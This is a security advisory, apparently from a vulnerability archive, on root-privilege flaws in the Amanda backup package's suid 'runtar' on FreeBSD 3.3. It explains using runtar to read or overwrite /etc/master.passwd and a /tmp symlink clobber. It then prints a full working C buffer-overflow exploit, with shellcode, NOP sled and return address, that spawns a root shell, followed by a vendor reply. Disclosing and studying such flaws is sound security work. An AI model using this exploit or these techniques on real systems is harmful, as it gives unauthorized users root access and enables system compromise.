COMMAND
Amanda
SYSTEMS AFFECTED
multiple platforms... (FreeBSD, BSDi, etc)
PROBLEM
Brock Tellier found following. The Amanda backup package has a
several vulnerabilities which will allow any user to gain root
privs. Brock's tests were done ONLY on FreeBSD 3.3-RELEASE,
though this is almost certainly not the only vulnerable OS. A
search for "amanda-2 and not freebsd" on altavista yields
preliminary, unconfirmed data that some of the vulnerable OS's
(based on packages that are included on install CD's, anyone can
install Amanda to make themselves vulnerable) may be: RedHat
?.?, TurboLinux, PowerTools CD, SuSE 6.2 Confirmation on which
OS's/tar's are vulnerable would be useful.
Amanda's "runtar" program, suid root by default on FreeBSD 3.3,
calls /usr/bin/tar and passes all args given to runtar to this
program. Tar is thus run with root permissions and is vulnerable
to all of the same attacks on suid programs that it would have if
it were suid itself.
Vuln #1 - run tar as root
=========================
Since tar is run with root permissions, you are free to tar up any
file you wish, including /etc/master.passwd. You may also untar
any file you wish, to any location on the system, including
/etc/master.passwd. This does not require any exploit kung-fu
and may be done by supplying args to tar/runtar as if you were
root.
Vuln #1.1 - tar contains a buffer overflow
==========================================
Obtaining root via buffer overflow here is redundant, of course,
but it illustrates the point that even if tar's capabilities
weren't able to gain root privs, the buffer overflow would still
allow you to do so. An overflow exists *IN TAR* which will allow
any user to execute commands as root. Note that an overflow in
tar isn't an immediate security flaw since it is never suid/sgid,
but it goes to show that one should do security audits of all the
programs one calls with user input. By passing a long string to
runtar in the form
/usr/local/libexec/amanda/runtar cvf $400bytes:bah
we can execute our commands. FreeBSD exploit attached below.
Vuln #2 - symlink problem
==========================
Not quite as serious, but a concern nonetheless. When the amandad
daemon is run, a bin-owned file called "amandad.debug" in /tmp.
By creating a symlink from /tmp/amandad.debug to any other file,
we will force amandad to clobber the contents with that of
amandad's debug info. Note that amandad is not suid/sgid, but it
is often run with root perms at startup or via scripts.
Vulnerable is anyone running a suid version of runtar should be
suspicious. Brock did not tested any other O.S.'s except FreeBSD
3.3, which includes amanda 2.3.0 and 2.4.1 as "additional
packages" on the install CD and tar-1.11.2.
Exploit:
/*
* Amanda runtar exploit yields euid=0(root)
* Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
* Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
* platforms
*
* Compile gcc -o amandax amandax.c
* Run ./amandax <offset> <buflen>
* keep buflen around 400, try positive and negative offsets
*
* Brock Tellier btellier@usa.net
*/
#include <stdlib.h>
#include <stdio.h>
char fbsdshell[]= /* mudge@lopht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
#define LEN 400
#define NOP 0x90
#define ALIGN 3
#define OFFSET 0
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */
int main(int argc, char *argv[]) {
long int offset=OFFSET;
int i;
int buflen = LEN;
long int addr = ADDR;
char buf[LEN];
if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) buflen = atoi(argv[2]);
if (argc > 3) {
fprintf(stderr, "Usage: %s <offset> <buflen>");
exit(0);
}
fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n",
addr+offset, buflen, offset);
memset(buf,NOP,buflen);
memcpy(buf+100,fbsdshell,strlen(fbsdshell));
for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int
*)&buf[i]=addr+offset;
execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
NULL);
exit(0);
}
SOLUTION
If your amanda is properly installed, then it is as a user amanda,
bin, or operator, none of which should be accessible from a
regular user. If this account is compromised, then security is
irrelevant because amanda need to be able to read the raw disk
files (to do backups) and thus would be able to get /etc/shadow
(or the local equivalent) without much work.
Amanda has undergone a major security auditing before release
2.4.0 final (the latest stable release is 2.4.1p1), in which a
couple of security problems have been fixed, and a lot of
security problem-prone constructs have been reworked to avoid
buffer overflows and such.